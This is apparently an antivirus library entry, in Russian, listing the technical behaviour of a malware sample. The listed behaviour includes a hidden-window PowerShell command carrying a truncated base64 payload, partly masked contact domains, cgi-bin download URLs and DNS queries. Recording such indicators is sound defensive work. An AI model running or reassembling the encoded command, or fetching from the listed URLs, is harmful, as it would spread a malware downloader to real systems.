Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\1201925.cvr
- 'ri####ewelder.com':80
- 'si###gps.com':80
- 'si###gps.com':443
- 'pa#####kphotography.com':443
- 'th####estgeek.com':80
- 'un###ewv.com':80
- 'tu#s.pl':80
- http://ri####ewelder.com/dtbkup20110205/i/
- http://si###gps.com/cgi-bin/7/
- http://th####estgeek.com/error/FS/
- http://www.th####estgeek.com/error/FS/
- http://un###ewv.com/cgi-bin/OVJ9qY/
- http://www.un###ewv.com/cgi-bin/OVJ9qY/
- http://tu#s.pl/cgi-bin/7a9/
- http://tu#s.pl/cgi-bin/7a9
- 'si###gps.com':443
- 'pa#####kphotography.com':443
- DNS ASK ri####ewelder.com
- DNS ASK si###gps.com
- DNS ASK tf###ru.com.br
- DNS ASK pa#####kphotography.com
- DNS ASK th####estgeek.com
- DNS ASK un###ewv.com
- DNS ASK tu#s.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)